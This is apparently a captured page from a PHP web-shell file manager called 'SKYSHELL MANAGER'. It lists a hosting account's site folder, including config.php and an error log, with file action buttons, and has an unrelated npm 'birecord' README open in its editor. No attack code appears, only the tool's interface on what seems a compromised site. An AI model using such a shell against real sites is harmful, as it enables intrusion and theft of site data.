📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
chb_data
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
36213.76 KB
0644
🗑️
⬇️
✏️
🔒
Editing: README.md
# birecord Bi-directional record in type-safe way ## How to use ```sh npm install birecord ``` ```ts import birecord from "birecord"; // import birecord_for_deno from "https://deno.land/x/birecord/mod.ts"; const x = birecord({ foo: 123, bar: 456, baz: 789 }); const test1 = x.get("foo"); // 123 const test2 = x.get(123); // "foo" ```
💾 Save Changes